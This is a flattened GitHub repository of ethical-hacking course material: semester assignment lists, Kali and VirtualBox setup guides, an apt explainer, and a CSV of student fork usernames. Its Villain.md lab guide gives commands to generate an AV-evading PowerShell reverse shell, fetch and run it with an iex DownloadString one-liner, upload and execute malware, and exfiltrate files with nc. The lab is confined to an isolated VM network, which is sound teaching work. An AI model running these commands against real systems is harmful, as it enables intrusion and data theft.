├── EH-Syllabus.md:Zone.Identifier ├── LICENSE ├── .repo ├── README.md ├── Assignment_List_For_All.md ├── fork-users.csv ├── fork-users.md └── Assignment_Mapped_For_All.md ├── Difference-Between apt update & apt-get update.md ├── Villain.md ├── CyberRange Lab configuration.md ├── README.md ├── Sudo Usage Guide L1.md ├── Nmap Command Notes L1, L2 and L3.md ├── Basic Linux Commands for Begin.md ├── EH-Syllabus.md └── .github └── workflows └── update-fork-users.yml /EH-Syllabus.md:Zone.Identifier: -------------------------------------------------------------------------------- 1 | [ZoneTransfer] 2 | ZoneId=3 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 sector21 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /.repo/README.md: -------------------------------------------------------------------------------- 1 | # Fork Users Data 2 | 3 | **Total Forks:** 105 4 | **Report Generated:** 2025-12-16 01:47:27 IST 5 | 6 | ## Summary Statistics 7 | 8 | | Status | Count | Percentage | 9 | |--------|-------|------------| 10 | | PASS | 88 | 83.8% | 11 | | FAIL | 17 | 16.2% | 12 | | **Total** | **105** | **100%** | 13 | 14 | ## Data Files 15 | - **CSV Format**: `fork-users.csv` - Machine readable format 16 | - **Markdown Format**: `fork-users.md` - Human readable table format with clickable links 17 | 18 | ## Data Structure 19 | - **Profile Name**: User's display name or GitHub username 20 | - **Username**: GitHub profile link (clickable in markdown format) 21 | - **Repo Count**: Total number of public repositories 22 | - **EthicalHackingNotes-Christ Check**: PASS if user has this specific repo, FAIL if not 23 | 24 | ## Sorting Order 25 | Users are sorted chronologically by fork creation date: 26 | - **First user to fork** appears at the top 27 | - **Last user to fork** appears at the bottom 28 | 29 | ## Usage 30 | - Use the **CSV file** for data analysis, spreadsheet imports, or automated processing 31 | - Use the **Markdown file** for easy browsing with clickable GitHub profile links 32 | 33 | ## Repository Check 34 | The `EthicalHackingNotes-Christ` column helps identify users who have created or forked the specific repository of interest. -------------------------------------------------------------------------------- /Difference-Between apt update & apt-get update.md: -------------------------------------------------------------------------------- 1 | # Difference Between `apt update` and `apt-get update` 2 | 3 | When managing packages in a Debian-based Linux system like Ubuntu, you might come across two similar commands: `apt update` and `apt-get update`. Let's explore the differences between these two commands, especially for beginners in cybersecurity. 4 | 5 | ## Overview 6 | - **`apt`** and **`apt-get`** are tools used to interact with the package management system in Debian-based Linux distributions. 7 | - **`apt update`** and **`apt-get update`** are used to update the package list, but they have some differences in terms of usability and intended audience. 8 | 9 | ### Key Differences 10 | 11 | | Feature | `apt update` | `apt-get update` | 12 | |--------------------------|-----------------------------------|-----------------------------------| 13 | | **User Experience** | More user-friendly and easy to use | Traditional, more complex, and detailed | 14 | | **Output** | Provides progress bar and better formatting | Plain text output, without progress bar | 15 | | **Recommended For** | General users and beginners | Advanced users and scripts | 16 | | **Default Tool** | Introduced to replace `apt-get` for everyday use | Older tool for package management | 17 | | **Commands Available** | Shorter and more intuitive | More commands, but more complex | 18 | 19 | ### Detailed Points 20 | 21 | 1. **Command Introduction** 22 | - **`apt`** is a newer command introduced as a more user-friendly tool to replace some of the commonly used functions of `apt-get`. 23 | - **`apt-get`** has been around for a long time and is more suitable for scripting and automation tasks. 24 | 25 | 2. **User Experience** 26 | - **`apt update`** has a cleaner output that includes a progress bar, making it easier to understand what's happening during the update process. 27 | - **`apt-get update`** provides a more raw output, which can be beneficial for debugging or advanced users who want to see detailed information. 28 | 29 | 3. **Which One Should You Use?** 30 | - For beginners in cybersecurity, it's recommended to use **`apt update`** as it is more intuitive and provides clearer feedback. 31 | - Advanced users, or those who need to automate processes, may still prefer **`apt-get update`** due to its more consistent behavior in scripts. 32 | 33 | ### Summary 34 | - Both **`apt update`** and **`apt-get update`** update the package lists from the repositories, so the system knows about the latest versions of the software available. 35 | - Use **`apt update`** for a simplified, user-friendly experience. 36 | - Use **`apt-get update`** for scripting or when more control is needed. 37 | 38 | > Remember: When managing packages, `apt` is more suited for beginners, while `apt-get` is for more advanced and automation use cases. 39 | 40 | -------------------------------------------------------------------------------- /.repo/Assignment_List_For_All.md: -------------------------------------------------------------------------------- 1 | # Ethical Hacking Assignments - Semester 5, 2025 2 | 3 | ## Assignment Instructions 4 | 5 | * **Duration**: 2 hours maximum 6 | * **Report**: 1-page report per assignment 7 | * **Repository**: Create a GitHub repository named `EH_sem5_2025_Notes` 8 | * **Directory**: Submit all assignments in the `1st Assignment` directory 9 | * **Deadline**: Submit by next Friday 10 | 11 | --- 12 | 13 | ## Student Assignments 14 | 15 | ### Assignment 1: TCP and UDP Port Discovery 16 | 17 | * Use `nmap` to scan both TCP and UDP ports on `scanme.nmap.org`. 18 | * Save the results and summarize open services. 19 | * **Report**: Explain TCP vs UDP ports + screenshot of the scan. 20 | 21 | ### Assignment 2: Full Port Scan 22 | 23 | * Use `nmap -p-` to scan all 65535 ports on `testphp.vulnweb.com`. 24 | * **Script**: Save the command as a `.sh` file and automate output saving. 25 | 26 | ### Assignment 3: DNS and IP Discovery 27 | 28 | * Use `nmap -sL` and `dig` to find IPs, DNS info of `zero.webappsecurity.com`. 29 | * Create a flowchart: DNS resolution process. 30 | 31 | ### Assignment 4: Create Low-Privilege User 32 | 33 | * In Kali VM, create a user `student01` with no sudo access. 34 | * Use `adduser`, `usermod`, and confirm permissions. 35 | * **Evidence**: Screenshot of commands + `/etc/passwd` snippet. 36 | 37 | ### Assignment 5: File Creation and Permission 38 | 39 | * Create a file using `touch`. Change permission to `751`. 40 | * Use `chmod`, `ls -l`, and explain octal notation. 41 | 42 | ### Assignment 6: What is Shodan? 43 | 44 | * Visit [Shodan.io](https://shodan.io), search for `scanme.nmap.org`. 45 | * Document what data is visible and its use for attackers and defenders. 46 | 47 | ### Assignment 7: Explain Core Network Terms 48 | 49 | * Create a 1-page illustrated document: 50 | 51 | * NAT, ARP, MAC, IPv4, IPv6 52 | * One-line explanation and diagram each. 53 | 54 | ### Assignment 8: Directory Monitoring Bash Script 55 | 56 | * Write a 15-line bash script to monitor changes in `/home/student/Downloads`. 57 | * Log the change type (file created/deleted/modified). 58 | 59 | ### Assignment 9: Mini Port Scanner Script 60 | 61 | * Write a bash script that: 62 | 63 | * Takes IP as input 64 | * Scans top 1000 ports 65 | * Saves results in `scan_.log` 66 | 67 | ### Assignment 10: Linux AI Help Chat using Groq API 68 | 69 | * Use Groq’s free API to create a CLI chatbot. 70 | * Input: Any Linux command. 71 | * Output: Easy explanation. 72 | * **Limit**: ≤ 15 lines Python code. 73 | 74 | ### Assignment 11: Ncat Chat Terminal 75 | 76 | * Create a script with 10 lines to simulate chat using `ncat`. 77 | * Terminal A: Listener 78 | * Terminal B: Connects and sends message 79 | 80 | ### Assignment 12: Serve a Directory using Python 81 | 82 | * Use `python3 -m http.server 8080` in a directory. 83 | * Screenshot server + browser result + terminal command. 84 | 85 | ### Assignment 13: VirusTotal API Usage 86 | 87 | * Register for [VirusTotal](https://virustotal.com) API key. 88 | * Use Python or bash with `curl` to check hash details of a test file. 89 | * **Code limit**: 10-15 lines. 90 | 91 | ### Assignment 14: Sudo Usage Logging 92 | 93 | * Create a Python/Bash script that monitors `/var/log/auth.log` every 30s. 94 | * If `sudo` success/fail found, log username + time. 95 | 96 | ### Assignment 15: System Hack Timeline 97 | 98 | * Pick any past real-life attack (e.g., Equifax breach). 99 | * Document a 6-step timeline (initial access → data exfiltration). 100 | 101 | ### Assignment 16: Detect Service Version with Nmap 102 | 103 | * Use `nmap -sV` on `testphp.vulnweb.com`. 104 | * Summarize at least 3 detected services with versions and known CVEs. 105 | 106 | ### Assignment 17: Bash Script for Auto Ping and Log 107 | 108 | * Create a script that: 109 | 110 | * Pings a domain every 5 mins 111 | * Logs response time in a CSV file with timestamp 112 | 113 | ### Assignment 18: Discover Hidden Directories 114 | 115 | * Use `dirb` or `gobuster` on `testphp.vulnweb.com`. 116 | * Document at least 5 discovered directories. 117 | 118 | ### Assignment 19: Python Socket Port Scanner 119 | 120 | * Create a script that scans ports 1–100 on a given domain. 121 | * Limit: 15 lines 122 | * Add sleep between scans and proper output formatting. 123 | 124 | ### Assignment 20: Check Internet Exposure via Shodan 125 | 126 | * Search your public IP on Shodan. 127 | * Document what services are visible (mask IP in report). 128 | * Reflect on what to do to harden your system. 129 | 130 | --- 131 | 132 | ## Submission Guidelines 133 | 134 | 1. **Repository Setup**: Create `EH_sem5_2025_Notes` repository 135 | 2. **Directory Structure**: Create `1st Assignment` folder 136 | 3. **Report Format**: 137 | 138 | * 1-page maximum 139 | * Include screenshots where applicable 140 | * Document your methodology 141 | * Explain findings and conclusions 142 | 4. **Code Submission**: Include all scripts and configurations 143 | 5. **Deadline**: Submit by next Friday 144 | 145 | ## Assessment Criteria 146 | 147 | * **Technical Implementation** (40%) 148 | * **Report Quality** (30%) 149 | * **Security Analysis** (20%) 150 | * **Documentation** (10%) 151 | 152 | --- 153 | 154 | **Note**: All assignments are designed for educational purposes. Use only authorized systems and follow ethical hacking principles. Remember to respect privacy and legal boundaries in all activities. 155 | -------------------------------------------------------------------------------- /Villain.md: -------------------------------------------------------------------------------- 1 | # Simple Villain Framework Lab Guide 2 | 3 | A step-by-step lab using **Kali Linux** (attacker) and **Windows 10** (victim) in VirtualBox, from payload gen to file transfers. 4 | 5 | --- 6 | 7 | ## 1. VirtualBox VM & Networking Setup 8 | 9 | 1. **Create VMs** in VirtualBox: 10 | 11 | * **Kali Linux** 12 | * **Windows 10** 13 | 2. **Set both adapters** to an **Internal Network** (or Host-Only) named `LabNet`. 14 | 3. **Assign static IPs** on the same `/24` subnet: 15 | 16 | * **Kali** (terminal): 17 | 18 | ```bash 19 | sudo ip addr add 192.168.56.10/24 dev eth0 20 | sudo ip link set eth0 up 21 | ``` 22 | * **Windows 10** (Control Panel → Network Adapter → IPv4 settings): 23 | 24 | ```text 25 | IP address: 192.168.56.20 26 | Subnet mask: 255.255.255.0 27 | Gateway/DNS: (leave blank) 28 | ``` 29 | 4. **Verify connectivity**: 30 | 31 | ```bash 32 | # On Kali 33 | ping 192.168.56.20 34 | ``` 35 | 36 | You should see replies. 37 | 38 | --- 39 | 40 | ## 2. Prepare Kali Attacker 41 | 42 | 1. **Update & upgrade**: 43 | 44 | ```bash 45 | sudo apt update && sudo apt upgrade -y 46 | ``` 47 | 2. **Clone Villain**: 48 | 49 | ```bash 50 | git clone https://github.com/keralahacker/Villain.git 51 | cd Villain 52 | ``` 53 | 54 | > If GitHub is blocked (e.g. college Wi‑Fi), use a VPN or your phone’s hotspot. 55 | 3. **Install Python deps**: 56 | 57 | ```bash 58 | pip install -r requirements.txt 59 | ``` 60 | ```bash 61 | sudo pip install -r requirements.txt --break-system-packages 62 | ``` 63 | If it fails, skip to next step. 64 | 4. **Start Villain**: 65 | 66 | ```bash 67 | python3 Villain.py 68 | ``` 69 | 70 | You’ll see the `villain>` prompt. 71 | 72 | --- 73 | 74 | ## 3. Build & Deliver Your Payload 75 | 76 | ### 3.1 Generate the reverse shell 77 | 78 | ``` 79 | villain> generate payload= lhost= [encode|obfuscate] 80 | ``` 81 | 82 | | Element | Meaning | Example | 83 | | ------------- | ---------------------------- | ------------------------- | 84 | | `OS` | Target OS family | `windows` | 85 | | `handler` | Connection type | `reverse_tcp` (stable) | 86 | | `template` | Payload script | `powershell` | 87 | | `lhost` | Your Kali IP or interface | `192.168.56.10` or `eth0` | 88 | | `[encode]` | Simple Base64-style encoding | optional (helps evade AV) | 89 | | `[obfuscate]` | String-twisting for stealth | optional | 90 | 91 | **Example:** 92 | 93 | ```bash 94 | villain> generate payload=windows/reverse_tcp/powershell lhost=192.168.56.10 encode 95 | ``` 96 | 97 | This writes `payload.ps1` for the Windows VM. 98 | 99 | ### 3.2 Host & run the payload 100 | 101 | 1. **On Kali**, serve it over HTTP: 102 | 103 | ```bash 104 | cp Core/payloads/windows/reverse_tcp/powershell.ps1 ~/payload.ps1 105 | cd ~ 106 | python3 -m http.server 8000 107 | ``` 108 | 2. **On Windows 10** (PowerShell as Admin): 109 | 110 | ```powershell 111 | iex (New-Object Net.WebClient).DownloadString('http://192.168.56.10:8000/payload.ps1') 112 | ``` 113 | 114 | This runs the reverse shell back to Kali. 115 | 116 | --- 117 | 118 | ## 4. Catch & Use Your Shell 119 | 120 | 1. **List sessions**: 121 | 122 | ```bash 123 | villain> sessions 124 | ``` 125 | 2. **Enter the shell**: 126 | 127 | ```bash 128 | villain> shell 129 | ``` 130 | 131 | You get a `PS C:\>` prompt. Use `exit` or Ctrl+C to return. 132 | 133 | --- 134 | 135 | ## 5. Uploading Files to the Victim 136 | 137 | ``` 138 | villain> upload 139 | ``` 140 | 141 | * **Example:** 142 | 143 | ```bash 144 | villain> upload /home/kali/tools/malware.exe C:\Users\Public\malware.exe 145 | ``` 146 | * Then inside your shell: 147 | 148 | ```powershell 149 | PS C:\> & 'C:\Users\Public\malware.exe' 150 | ``` 151 | 152 | --- 153 | 154 | ## 6. Downloading Files from the Victim 155 | 156 | Villain has no built-in “download,” but you can exfiltrate: 157 | 158 | 1. **On Kali**, listen: 159 | 160 | ```bash 161 | nc -lvp 9001 > secret.txt 162 | ``` 163 | 2. **In Windows shell:** 164 | 165 | ```powershell 166 | PS C:\> nc 192.168.56.10 9001 < C:\Users\Public\secret.txt 167 | ``` 168 | 169 | Alternatively, spin up an HTTP server on Windows: 170 | 171 | ```powershell 172 | PS C:\Users\Public> python3 -m http.server 8000 173 | ``` 174 | 175 | Then on Kali: 176 | 177 | ```bash 178 | wget http://192.168.56.20:8000/secret.txt -O secret.txt 179 | ``` 180 | 181 | --- 182 | 183 | ## 7. Cleaning Up & Tips 184 | 185 | * **flee**: Exit without killing sessions: 186 | 187 | ```bash 188 | villain> flee 189 | ``` 190 | * **purge**: Wipe saved implant metadata: 191 | 192 | ```bash 193 | villain> purge 194 | ``` 195 | 196 | **Pro Tips:** 197 | 198 | * Verify your **lhost** and subnet before generating. 199 | * Use `backdoors` to list re-usable payloads. 200 | * Keep Kali’s firewall off on the lab network. 201 | 202 | --- 203 | 204 | ## 8. Broadcast Messages with `#` 205 | 206 | You can send a chat message to all connected sibling servers by prefixing with `#`: 207 | 208 | ```bash 209 | villain> # Hey team, switch to backup C2 channel 210 | ``` 211 | 212 | --- 213 | 214 | That’s the full lab: network setup, payload gen, shell, file IO, and messaging. Enjoy your ethical testing! 215 | -------------------------------------------------------------------------------- /CyberRange Lab configuration.md: -------------------------------------------------------------------------------- 1 | # Getting Started with Kali Linux on Windows using VirtualBox 2 | 3 | This guide will walk you through downloading, installing, extracting, and running **Kali Linux** in a **Windows 10/11** environment using **Oracle VirtualBox**. It has been structured specifically for cybersecurity and ethical hacking learners who want to create a secure, isolated lab setup. 4 | 5 | --- 6 | 7 | ## ☑ Prerequisites: Setup Virtualization Environment 8 | 9 | ### 1. Install VirtualBox 10 | 11 | * Visit [https://www.virtualbox.org/wiki/Downloads](https://www.virtualbox.org/wiki/Downloads) 12 | * Choose **Windows hosts** if your system runs Windows 10 or 11 13 | * Download the installer and run it 14 | 15 | * Locate the file in `Downloads` 16 | * Right-click and **Run as Administrator** 17 | * Follow the installer wizard: Click **Next**, **Install**, and **Finish** 18 | * A **reboot is recommended** after installation 19 | 20 | ### 2. Enable Windows Virtualization Features 21 | 22 | * Open **Start Menu** → search for `Turn Windows features on or off` 23 | * Enable the following checkboxes: 24 | 25 | * `Hyper-V` 26 | * `Virtual Machine Platform` 27 | * `Windows Hypervisor Platform` 28 | * `Windows Subsystem for Linux` 29 | * Click **OK** and **Reboot** your system 30 | 31 | --- 32 | 33 | ## ☑ Install 7-Zip (for extracting .7z files) 34 | 35 | ### 1. Download 7-Zip 36 | 37 | * Visit [https://www.7-zip.org/](https://www.7-zip.org/) 38 | * Download the appropriate version for your system (64-bit recommended) 39 | 40 | ### 2. Install 7-Zip 41 | 42 | * Locate the downloaded installer 43 | * Right-click → **Run as Administrator** 44 | * Click **Next**, **Install**, and **Finish** 45 | 46 | --- 47 | 48 | ## ☑ Download & Extract Kali Linux for VirtualBox 49 | 50 | ### 1. Download Kali Linux VM 51 | 52 | * Go to [https://www.kali.org/get-kali/#kali-virtual-machines](https://www.kali.org/get-kali/#kali-virtual-machines) 53 | * Choose the **VirtualBox Image** under "Kali Linux Virtual Machines" 54 | 55 | * Prefer the **standard release**, not the weekly build (avoid dev/debugging versions) 56 | 57 | ### 2. Extract the .7z File 58 | 59 | * Locate the file: `kali-linux-2025.2-virtualbox-amd64.7z` 60 | * Right-click → 7-Zip → **Extract Here** 61 | * Wait for 2–5 minutes 62 | * You will get a folder named: `kali-linux-2025.2-virtualbox-amd64` 63 | 64 | This folder contains the **Kali VM image** and configuration for VirtualBox. 65 | 66 | --- 67 | 68 | ## ☑ Open Kali Linux in VirtualBox 69 | 70 | ### 1. Locate & Open VM 71 | 72 | * Open the extracted folder 73 | * Locate a file named `kali-linux-2025.2-virtualbox-amd64.vbox` 74 | * Double-click this `.vbox` file 75 | 76 | * This action will auto-import the VM into **VirtualBox** 77 | 78 | ### 2. Verify VM is Loaded 79 | 80 | * VirtualBox will display the Kali VM in the sidebar 81 | 82 | --- 83 | 84 | ## ☑ Configure Kali Linux VM (Safe + Optimized) 85 | 86 | ### Edit VM Settings: 87 | 88 | * Right-click on the Kali VM → **Settings** 89 | 90 | **System Settings:** 91 | 92 | * Base Memory: **2048 MB** (2 GB RAM) 93 | * Processor(s): **2 CPUs** 94 | 95 | **Network:** 96 | 97 | * Adapter 1: **NAT** (for internet access) 98 | 99 | **Shared Folders (Optional):** 100 | 101 | * Add shared folders between host and guest for easy file transfer 102 | 103 | --- 104 | 105 | ## ☑ Start Kali Linux 106 | 107 | ### 1. Power On the VM 108 | 109 | * Click **Start** or double-click the VM name 110 | 111 | ### 2. Login Credentials 112 | 113 | * Username: `kali` 114 | * Password: `kali` 115 | 116 | --- 117 | 118 | ## ☑ First Things to Do After Boot 119 | 120 | ### 1. Update and Upgrade System 121 | 122 | ```bash 123 | sudo apt update && sudo apt upgrade -y 124 | ``` 125 | 126 | ### 2. Reboot System 127 | 128 | ```bash 129 | sudo reboot 130 | ``` 131 | 132 | ### 3. (Optional) Change Password 133 | 134 | ```bash 135 | sudo passwd 136 | # Enter new password twice 137 | ``` 138 | 139 | ### 4. Install a Better Terminal 140 | 141 | The default terminal may be slow or unresponsive. Install **Terminator**: 142 | 143 | ```bash 144 | sudo apt install -y terminator 145 | ``` 146 | 147 | --- 148 | 149 | ## ☑ Summary Checklist 150 | 151 | | Step | Status | 152 | | ---------------------------- | ------ | 153 | | VirtualBox Installed | ☑ | 154 | | Hypervisor Enabled | ☑ | 155 | | 7-Zip Installed | ☑ | 156 | | Kali VM Downloaded | ☑ | 157 | | Kali VM Extracted | ☑ | 158 | | Kali VM Opened in VirtualBox | ☑ | 159 | | VM Configured (RAM/CPU/NAT) | ☑ | 160 | | Kali Updated & Ready | ☑ | 161 | 162 | --- 163 | 164 | ## 📚 Additional Recommendations 165 | 166 | * Always **update Kali** before starting new labs 167 | * **Snapshot** the VM state after initial setup (optional but recommended) 168 | * Keep a backup of the `.vbox` and `.vdi` files 169 | * Avoid using Kali Linux VM for general browsing 170 | * Use it strictly as a **sandbox** for ethical hacking practices 171 | 172 | --- 173 | 174 | ## 💼 Intended Audience 175 | 176 | This document is tailored for **Cybersecurity & Ethical Hacking** students aiming to: 177 | 178 | * Practice hands-on penetration testing 179 | * Learn security tools in a virtual lab 180 | * Build real-world ethical hacking experience 181 | 182 | --- 183 | 184 | For any issues or improvements, raise a ticket or contact your course instructor. 185 | 186 | --- 187 | 188 | **Author**: Vaishnavu C V 189 | **Role**: Principal CyberSecurity Engineer, Mentor & Ethical Hacker 190 | **Code Name**: `@hackwithvyshu` 191 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ethical Hacking Assignments - Semester 3, 2025 2 | 3 | ## 📋 Quick Index 4 | **Last Updated:** 29/07/2025 5 | **Version:** 1.0 6 | **Total Students:** 103 7 | **Total Assignments:** 20 8 | 9 | ### 🎯 Assignment Overview 10 | - **Total Assignments:** 20 unique assignments 11 | - **Total Students:** 103 students 12 | - **Duration:** 2 hours maximum per assignment 13 | - **Report:** 2-3page report per assignment 14 | - **Deadline:** Submit befor next Friday 15 | 16 | --- 17 | 18 | ## 📚 Assignment Index 19 | 20 | ### 🔍 Network Reconnaissance 21 | 1. **TCP and UDP Port Discovery** - Scan `scanme.nmap.org` for open ports 22 | 2. **Full Port Scan** - Scan all 65,535 ports on `testphp.vulnweb.com` 23 | 3. **DNS and IP Discovery** - Find IPs and DNS info of `zero.webappsecurity.com` 24 | 4. **Detect Service Version with Nmap** - Version detection on `testphp.vulnweb.com` 25 | 5. **Check Internet Exposure via Shodan** - Personal security audit 26 | 27 | ### 🛡️ System Security 28 | 6. **Create Low-Privilege User** - Create `student01` user without sudo access 29 | 7. **File Creation and Permission** - Set file permissions to 751 30 | 8. **Sudo Usage Logging** - Monitor `/var/log/auth.log` for sudo attempts 31 | 32 | ### 🕵️ Information Gathering 33 | 9. **What is Shodan?** - Explore Shodan.io for `scanme.nmap.org` 34 | 10. **Explain Core Network Terms** - Create guide for NAT, ARP, MAC, IPv4, IPv6 35 | 11. **System Hack Timeline** - Research real cyber attacks (6-step timeline) 36 | 12. **Discover Hidden Directories** - Use `dirb`/`gobuster` on `testphp.vulnweb.com` 37 | 38 | ### 💻 Scripting & Automation 39 | 13. **Directory Monitoring Bash Script** - 15-line script to monitor `/home/student/Downloads` 40 | 14. **Mini Port Scanner Script** - Bash script for top 1000 ports 41 | 15. **Bash Script for Auto Ping and Log** - Ping domain every 5 mins, log to CSV 42 | 16. **Python Socket Port Scanner** - 15-line Python script for ports 1-100 43 | 44 | ### 🤖 AI & Modern Tools 45 | 17. **Linux AI Help Chat using Groq API** - 15-line Python chatbot for Linux commands 46 | 18. **VirusTotal API Usage** - 10-15 lines to check file hash with VirusTotal 47 | 48 | ### 🌐 Network Communication 49 | 19. **Ncat Chat Terminal** - 10-line script for chat using `ncat` 50 | 20. **Serve a Directory using Python** - Use `python3 -m http.server 8080` 51 | 52 | --- 53 | 54 | ## 👥 Student Distribution 55 | 56 | ### 📊 Distribution Summary 57 | - **Round 1:** Students 1-20 (20 students) 58 | - **Round 2:** Students 21-40 (20 students) 59 | - **Round 3:** Students 41-60 (20 students) 60 | - **Round 4:** Students 61-80 (20 students) 61 | - **Round 5:** Students 81-103 (23 students) 62 | 63 | ### 🎲 Assignment Rotation 64 | Each assignment is given to multiple students across different rounds: 65 | - **Assignment 1:** 5 students (one per round) 66 | - **Assignment 2:** 5 students (one per round) 67 | - **Assignment 3:** 5 students (one per round) 68 | - ... and so on for all 20 assignments 69 | 70 | --- 71 | 72 | ## 📝 Submission Requirements 73 | 74 | ### 📁 Repository Setup 75 | 1. Create GitHub repository: `EH_sem3_2025_Notes` 76 | 2. Create directory: `1st Assignment` 77 | 3. Submit all work in this directory 78 | 79 | ### 📄 Report Format (1-page maximum) 80 | - **Methodology:** How you approached the task 81 | - **Screenshots:** Where applicable 82 | - **Findings:** What you discovered 83 | - **Conclusions:** What you learned 84 | - **Code:** Include all scripts and configurations 85 | 86 | ### ⏰ Assessment Criteria 87 | - **Technical Implementation** (40%) 88 | - **Report Quality** (30%) 89 | - **Security Analysis** (20%) 90 | - **Documentation** (10%) 91 | 92 | --- 93 | 94 | ## 🛠️ Tools & Technologies 95 | 96 | ### 🔧 Primary Tools 97 | - **Nmap** - Network scanning and discovery 98 | - **Bash Scripting** - Automation and monitoring 99 | - **Python** - API integration and custom tools 100 | - **Linux Commands** - System administration 101 | - **Shodan** - Internet reconnaissance 102 | - **VirusTotal** - Malware analysis 103 | 104 | ### 🌐 Target Systems 105 | - `scanme.nmap.org` - Nmap's test server 106 | - `testphp.vulnweb.com` - Vulnerable web application 107 | - `zero.webappsecurity.com` - Security testing site 108 | 109 | --- 110 | 111 | ## ⚠️ Important Notes 112 | 113 | ### 🎓 Educational Purpose 114 | - All assignments are for **educational purposes only** 115 | - Use only **authorized systems** and targets 116 | - Follow **ethical hacking principles** 117 | - Respect **privacy and legal boundaries** 118 | 119 | ### 🔒 Security Guidelines 120 | - Only test systems you own or have permission to test 121 | - Do not attempt to access unauthorized systems 122 | - Report any discovered vulnerabilities responsibly 123 | - Maintain confidentiality of sensitive information 124 | 125 | --- 126 | 127 | ## 📞 Support & Resources 128 | 129 | ### 📚 Learning Resources 130 | - [Nmap Documentation](https://nmap.org/docs.html) 131 | - [Shodan Search Engine](https://shodan.io) 132 | - [VirusTotal API](https://developers.virustotal.com) 133 | - [Linux Command Reference](https://linux.die.net/man/) 134 | 135 | ### 🆘 Getting Help 136 | - Check assignment details in [Assignment_Mapped_For_All.md](https://github.com/sector21/EthicalHackingNotes/blob/main/.repo/Assignment_Mapped_For_All.md) 137 | - Review the detailed explanations and scenarios 138 | - Follow the step-by-step instructions provided 139 | - Contact instructor for clarification 140 | 141 | --- 142 | 143 | ## 📈 Progress Tracking 144 | 145 | ### ✅ Assignment Completion Checklist 146 | - [ ] Repository created with correct name 147 | - [ ] Assignment directory structure set up 148 | - [ ] Technical implementation completed 149 | - [ ] Screenshots and evidence collected 150 | - [ ] 1-page report written 151 | - [ ] Code and scripts included 152 | - [ ] Submission ready by deadline 153 | 154 | --- 155 | -------------------------------------------------------------------------------- /.repo/fork-users.csv: -------------------------------------------------------------------------------- 1 | Profile Name,Username,Repo Count,EthicalHackingNotes-Christ Check 2 | "Ebinesh-03","https://github.com/Ebinesh-03",4,"PASS" 3 | "JuliusDude","https://github.com/JuliusDude",19,"PASS" 4 | "SankaraNarayananS18","https://github.com/SankaraNarayananS18",6,"PASS" 5 | "JDANIELRAJ007","https://github.com/JDANIELRAJ007",2,"PASS" 6 | "Aaron-VS","https://github.com/Aaron-VS",7,"PASS" 7 | "Abel0606","https://github.com/Abel0606",9,"PASS" 8 | "Umeshwarkumar","https://github.com/Umeshwarkumar",13,"PASS" 9 | "joshuazacharyjose","https://github.com/joshuazacharyjose",9,"PASS" 10 | "EVAN-KS","https://github.com/EVAN-KS",4,"PASS" 11 | "Soumya-code-ai","https://github.com/Soumya-code-ai",8,"PASS" 12 | "Dineshbaburs","https://github.com/Dineshbaburs",8,"PASS" 13 | "B3ttina","https://github.com/B3ttina",7,"PASS" 14 | "AdithyaRaj672","https://github.com/AdithyaRaj672",9,"PASS" 15 | "Allanpremm","https://github.com/Allanpremm",4,"PASS" 16 | "alfindigo","https://github.com/alfindigo",7,"FAIL" 17 | "abelalexander18","https://github.com/abelalexander18",8,"PASS" 18 | "Darain-Brit-A","https://github.com/Darain-Brit-A",17,"PASS" 19 | "SanMaria28","https://github.com/SanMaria28",12,"PASS" 20 | "shaundx5","https://github.com/shaundx5",8,"PASS" 21 | "Patrick-Pio","https://github.com/Patrick-Pio",3,"PASS" 22 | "Deanjb3","https://github.com/Deanjb3",5,"PASS" 23 | "ishaZaara","https://github.com/ishaZaara",9,"PASS" 24 | "JoyAanchalRose","https://github.com/JoyAanchalRose",5,"PASS" 25 | "Ramya-9739","https://github.com/Ramya-9739",5,"PASS" 26 | "Rachel-joy07","https://github.com/Rachel-joy07",5,"PASS" 27 | "sasmitabtech","https://github.com/sasmitabtech",9,"PASS" 28 | "nithin811","https://github.com/nithin811",6,"PASS" 29 | "NITHEE-11","https://github.com/NITHEE-11",9,"PASS" 30 | "Nandana-19","https://github.com/Nandana-19",6,"PASS" 31 | "Kavin-cse","https://github.com/Kavin-cse",10,"PASS" 32 | "SharonC-droid","https://github.com/SharonC-droid",6,"PASS" 33 | "dan-jose2006","https://github.com/dan-jose2006",9,"PASS" 34 | "Joel-jarn","https://github.com/Joel-jarn",10,"PASS" 35 | "KARTHIK-RAJEEV","https://github.com/KARTHIK-RAJEEV",7,"PASS" 36 | "adisankar-oss","https://github.com/adisankar-oss",6,"PASS" 37 | "AnnmarieVinish","https://github.com/AnnmarieVinish",8,"PASS" 38 | "AnamiiiikaM","https://github.com/AnamiiiikaM",6,"PASS" 39 | "SREEHARIS16","https://github.com/SREEHARIS16",5,"PASS" 40 | "chrisbaptist07","https://github.com/chrisbaptist07",7,"PASS" 41 | "sajidarryl","https://github.com/sajidarryl",3,"FAIL" 42 | "annmary-aaa","https://github.com/annmary-aaa",4,"PASS" 43 | "krupa2412","https://github.com/krupa2412",3,"PASS" 44 | "samvrith66","https://github.com/samvrith66",5,"PASS" 45 | "Nikshitha2896","https://github.com/Nikshitha2896",6,"PASS" 46 | "SnehaT23","https://github.com/SnehaT23",9,"PASS" 47 | "tanushree-2006","https://github.com/tanushree-2006",5,"PASS" 48 | 